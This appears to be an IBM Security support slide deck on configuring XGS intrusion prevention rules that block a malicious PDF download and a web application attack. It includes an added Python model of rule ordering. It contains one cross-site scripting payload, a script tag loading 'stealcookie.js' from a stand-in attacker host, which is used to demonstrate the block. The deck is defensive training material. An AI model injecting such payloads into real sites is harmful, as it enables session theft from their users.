© 2015 IBM Corporation Jenson John, Padmaja Deshmukh L2 Technical Engineer IBM Security Systems February 22, 2016 Configuring an Intrusion Prevention Policy for blocking malicious files and blocking web application attacks

© 2015 IBM Corporation

Jenson John, Padmaja Deshmukh, L2 Technical Engineer, IBM Security Systems

February 22, 2016

Configuring an Intrusion Prevention Policy for blocking malicious files and blocking web application attacks

Use cases

  • Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block file-based attacks.

  • Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.

Use-case 1: Topology

In this scenario, XGS blocks a malicious file when an end user attempts to download it from a vulnerable web server.

Accessing the Intrusion Prevention Policy

To navigate to the Intrusion Prevention Policy in the XGS LMI, click the Secure Policy Configuration link in the main menu and then click Intrusion Prevention Policy under Security Policies.

Accessing and editing Default IPS object

Expand the left panel and select the Default IPS object. Right-click the Default IPS object and select Edit.

Editing IPS object

Enabling the Event Log

Add the Event Log object to Added Objects, then click Save Configuration and deploy the change.

Accessing Network Access Policy

To navigate to the Network Access Policy, click the Secure Policy Configuration link in the main menu and then click Network Access Policy under Security Policies.

Configuring a Network Access Rule

Click the New button to open the Add Network Access Rule window. On the General Configuration tab, enter 1 in the Order field, select the Enable check box, and set the Action to Accept.

Response Tab

In the Response tab, you can add an Event Log object so that traffic matching this rule is logged.

Source Tab

In the Source tab, select Any (indicates: Any Source).

Destination Tab

In the Destination tab, select Any (indicates: Any Destination).

Application Tab

In the Application tab, select Any.

Inspection Tab

In the Inspection tab, add the Default IPS inspection object.

Note: You can attach inspection objects to Network Access Policy rules in conjunction with other network objects (source, destination, application) so that only the traffic selected by the rule is inspected or logged.

Deploy Network Access Policy

After the rule is created, click Save Configuration and deploy the Network Access Policy (NAP).

Downloading the malicious file

Viewing the IPS Events

To view the IPS events, go to Monitor Analysis and Diagnostics > Logs and select IPS Events.

Log showing that XGS detected and blocked the malicious file

Under IPS Events > Pause Live Streaming, the U3D_Adobe_Memory_Corruption event is shown; it was triggered when the malicious PDF file was downloaded.

View the IPS event details

Select the event and click View Details to see the full event record.

Use-case 2

  • Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.

Use-case 2: Topology

In this scenario, XGS blocks a web application attack when an end user attempts to inject a malicious script into a vulnerable web server.

Accessing Intrusion Prevention Policy

Navigating in the Local Management Interface: Click Secure, and then click Intrusion Prevention Policy.

In the IPS Objects pane, click New > Inspection > Intrusion Prevention to create a new IPS object.

Response Tab

  • In the Response tab, you can enable Event Log, capture connection and capture packet.

  • It also includes configuring notifications about events through email, SNMP, and remote syslog alerts.

The new IPS object "Demo-WAP" is listed under the Inspection objects.

Adding filters

Enabling some of the Web Application Protection signatures in the Demo-WAP object and setting their action to block

Accessing Network Access Policy

Navigating in the Local Management Interface: Click Secure, and then click Network Access Policy.

Configuring a Network Access Rule

Click the New button to add a new Network Access Rule.

General Configuration Tab

Response Tab

Source Tab

Destination Tab

Application Tab

Inspection Tab

Schedule Tab

Tip: Place specific rules before general ones, because rules are applied in the order in which they are listed on the Network Access Policy page; the first matching rule wins, so a broad rule listed first silently shadows any narrower rule below it.
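The ordering tip above, as an added example that is not part of the IBM deck: a small Python model of first-match rule evaluation using the deck's rule fields (Order, Enable, Action, Source, Destination, Application, Inspection), plus a check that reports rules shadowed by an earlier, broader rule. The 192.0.2.10 server address, the rule sets and the shadowing check are constructed assumptions for illustration, not XGS behaviour taken from product documentation.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass
class Rule:
    order: int
    enabled: bool
    action: str                       # "Accept", as in the deck's rule 1
    source: str = "Any"               # CIDR or "Any"
    destination: str = "Any"          # CIDR or "Any"
    application: str = "Any"          # e.g. "HTTP" or "Any"
    inspection: Optional[str] = None  # IPS object attached on the Inspection tab


def _net_match(spec: str, addr: str) -> bool:
    return spec == "Any" or ip_address(addr) in ip_network(spec, strict=False)


def matches(rule: Rule, src: str, dst: str, app: str) -> bool:
    return (_net_match(rule.source, src) and _net_match(rule.destination, dst)
            and rule.application in ("Any", app))


def first_match(rules: List[Rule], src: str, dst: str, app: str) -> Optional[Rule]:
    """Rules are applied in Order; the first enabled rule that matches wins."""
    for rule in sorted(rules, key=lambda r: r.order):
        if rule.enabled and matches(rule, src, dst, app):
            return rule
    return None


def inspection_for(rules: List[Rule], src: str, dst: str, app: str) -> Optional[str]:
    """Name of the IPS object that will inspect this flow, or None if no rule matches."""
    hit = first_match(rules, src, dst, app)
    return hit.inspection if hit else None


def _covers(spec_a: str, spec_b: str) -> bool:
    # True when every address selected by spec_b is also selected by spec_a.
    if spec_a == "Any":
        return True
    if spec_b == "Any":
        return False
    return ip_network(spec_b, strict=False).subnet_of(ip_network(spec_a, strict=False))


def shadowed_orders(rules: List[Rule]) -> List[int]:
    """Orders of enabled rules that can never fire because an earlier enabled
    rule already matches everything they would match (the deck's tip, checked
    mechanically; assumption: a constructed check, not an XGS feature)."""
    ordered = [r for r in sorted(rules, key=lambda r: r.order) if r.enabled]
    out: List[int] = []
    for i, later in enumerate(ordered):
        if any(_covers(e.source, later.source) and _covers(e.destination, later.destination)
               and e.application in ("Any", later.application) for e in ordered[:i]):
            out.append(later.order)
    return out


# Constructed rule sets: a specific HTTP rule to the web server that uses the
# "Demo-WAP" IPS object, plus a catch-all like the deck's rule 1 (Default IPS).
GOOD = [Rule(1, True, "Accept", "Any", "192.0.2.10/32", "HTTP", "Demo-WAP"),
        Rule(2, True, "Accept", inspection="Default IPS")]
BAD = [Rule(2, True, "Accept", "Any", "192.0.2.10/32", "HTTP", "Demo-WAP"),
       Rule(1, True, "Accept", inspection="Default IPS")]
```

With GOOD ordering, HTTP to 192.0.2.10 is inspected by Demo-WAP and other traffic falls through to Default IPS; with BAD ordering the catch-all fires first and the Demo-WAP rule never runs.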

Simulating a Web Application Attack

Launch a browser and access the vulnerable web server, www.testfire.net. Click the Sign In link:

Adding a script to the Sign In page

<script src="http://hackerx.org/stealcookie.js"></script>

For the username, enter the script above; for the password, enter any string. Click Login.

XGS blocks the access

Viewing the IPS Events

To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link in the main menu, click Event Log, and then select the IPS Events tab.

Event generated by XGS for the associated attack

Event Detail

References

Configuring Network Access Policy: https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_about_acl_rules.htm

Configuring Intrusion Prevention Policy: https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_intrusion_prevention_policy_container.htm

Knowledge Center for XGS: https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/alps_collateral/alps_dochome_stg.htm

X-Force Virtual Patch Protection Levels for XGS and GX: http://www-01.ibm.com/support/docview.wss?uid=swg21701441

Questions?

Chat with IBM Technical Support

Subscribe to our Channel

https://www.youtube.com/user/IBMSecuritySupport

© Copyright IBM Corporation 2015. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT ANY SYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

THANK YOU

www.ibm.com/security